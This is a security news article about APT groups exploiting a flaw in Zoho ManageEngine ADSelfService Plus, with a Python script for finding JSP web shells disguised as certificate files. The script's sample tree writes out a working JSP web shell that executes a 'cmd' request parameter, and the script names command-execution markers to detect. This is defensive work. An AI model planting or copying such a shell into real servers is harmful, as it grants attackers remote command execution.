The FBI, the Cybersecurity and Infrastructure Security Agency (CISA) and the US Coast Guard Cyber Command (CGCYBER) have warned that, since August, advanced persistent threat (APT) groups have been exploiting a flaw in a password management product. The APT label refers to well-resourced attackers who use sophisticated techniques to gain access to a system and then remain inside it, undetected, for an extended period.
The software being exploited is Zoho ManageEngine ADSelfService Plus, used by several large companies including Apple, Intel, Nike, PayPal and HBO. It is a self-service password management and single sign-on product: users reset their own directory passwords and reach multiple applications with a single set of credentials.
The vulnerability, which has been assigned a CVE identifier, allows attackers to take control of the server, execute arbitrary code and deploy web shells on it, putting at risk the data of every company that runs the affected software.
A web shell is a script planted on a web server that the attacker drives through ordinary HTTP requests. It gives them remote command execution on the host and lets them read and change settings and data on the affected machine.
According to the agencies' joint statement, the vulnerability puts at risk academic institutions and critical infrastructure companies in the USA that use the program.
The joint alert also states that the vulnerability has already been exploited in real attacks. In those intrusions the attackers deployed web shells written in JavaServer Pages (JSP), the Java technology for building dynamic web pages, disguised as x509 certificate files. From that foothold they moved laterally across the network using Windows Management Instrumentation (WMI), the management framework built into Windows, and made copies of critical security files and databases.
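A defender reading the paragraph above will want to know how to find a JSP web shell hiding behind a certificate extension. The following script is an added example written for this article; it is not code from Zoho, the US agencies or the original article, and the directory layout, file names and file contents it uses are constructed for the demonstration. It walks a directory tree, picks out every file carrying a certificate extension, and reports the ones that contain JSP syntax or that have no recognisable certificate structure at all.

```python
import os
import re
import tempfile

# Extensions under which an x509 certificate would normally be stored.
CERT_EXTENSIONS = {".cer", ".crt", ".pem", ".der"}

# Byte sequences that belong in a JSP page and never in a certificate.
# Checked in this order; the order is reflected in the reported reason.
JSP_MARKERS = (
    b"<%",
    b"%>",
    b"Runtime.getRuntime()",
    b"ProcessBuilder",
    b"request.getParameter",
)

# A PEM certificate body between its BEGIN and END armour lines.
PEM_RE = re.compile(rb"-----BEGIN CERTIFICATE-----.*?-----END CERTIFICATE-----", re.S)


def classify_file(path):
    """Return (suspicious, reason) for one file.

    JSP markers are tested first, so a file that wraps a genuine PEM block
    around a JSP payload is still flagged.
    """
    with open(path, "rb") as fh:
        data = fh.read()
    found = [m.decode() for m in JSP_MARKERS if m in data]
    if found:
        return True, "JSP markers " + ", ".join(found)
    if PEM_RE.search(data):
        return False, "PEM certificate"
    if data[:1] == b"\x30":  # ASN.1 SEQUENCE tag that opens a DER certificate
        return False, "DER-encoded"
    return True, "no certificate structure"


def scan_tree(root):
    """Classify every certificate-extension file below root.

    Returns a sorted list of (relative_path, suspicious, reason) tuples,
    with forward slashes so results are stable across platforms.
    """
    results = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in CERT_EXTENSIONS:
                continue
            full = os.path.join(dirpath, name)
            suspicious, reason = classify_file(full)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            results.append((rel, suspicious, reason))
    return sorted(results)


def build_sample_tree():
    """Create a constructed directory tree (an assumption for the demo, not a
    real ADSelfService Plus install): one PEM certificate, one DER certificate,
    one JSP web shell saved under a .cer extension, and one junk .cer file."""
    root = tempfile.mkdtemp(prefix="cert-scan-")
    conf = os.path.join(root, "conf")
    web = os.path.join(root, "webapps", "adssp")
    os.makedirs(conf)
    os.makedirs(web)
    # Constructed PEM body; the base64 is filler, not a real certificate.
    pem = (b"-----BEGIN CERTIFICATE-----\n"
           b"MIIBszCCAVmgAwIBAgIUQ1ZGMjAxNjA4MTAwMDAwWjA=\n"
           b"-----END CERTIFICATE-----\n")
    # Constructed DER prefix: SEQUENCE tag followed by filler bytes.
    der = b"\x30\x82\x01\x0a" + b"\x00" * 16
    # Constructed JSP web shell: runs the "cmd" request parameter.
    shell = (b'<%@ page import="java.io.*" %>\n'
             b'<% String cmd = request.getParameter("cmd");\n'
             b'   if (cmd != null) { Process p = Runtime.getRuntime().exec(cmd);\n'
             b'     out.print(new String(p.getInputStream().readAllBytes())); } %>\n')
    files = {
        os.path.join(conf, "server.pem"): pem,
        os.path.join(conf, "readme.cer"): b"placeholder text, not a certificate\n",
        os.path.join(web, "ca.der"): der,
        os.path.join(web, "cert.cer"): shell,
    }
    for path, content in files.items():
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, suspicious, reason in scan_tree(build_sample_tree()):
        print(("SUSPICIOUS " if suspicious else "ok         ") + rel + "  (" + reason + ")")
```

Run it against the web application's deployment directory rather than the sample tree. The marker list is deliberately short and will miss an encoded or obfuscated payload, so treat a clean result as one data point next to the vendor's indicators of compromise, not as proof the host is untouched.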
How to prevent
So far the groups behind the attacks have targeted the transport, information technology, industrial, communications, logistics, infrastructure, academic and defence sectors. APT campaigns are carried out primarily for espionage: the intruders stay embedded in a system in order to copy company documents and sensitive files.
On September 6 Zoho released an update for ManageEngine ADSelfService Plus that fixes the flaw. In the security advisory issued with the update, the company said there was no proof that the vulnerability had been used; the later joint alert from the US agencies, however, reports that it had already been exploited.
The FBI, CISA and CGCYBER ask users to apply the update immediately, to make sure the program is not reachable directly from the internet, and to reset passwords if any sign of intrusion is found.
Source: Bleeping Computer, ThreatPost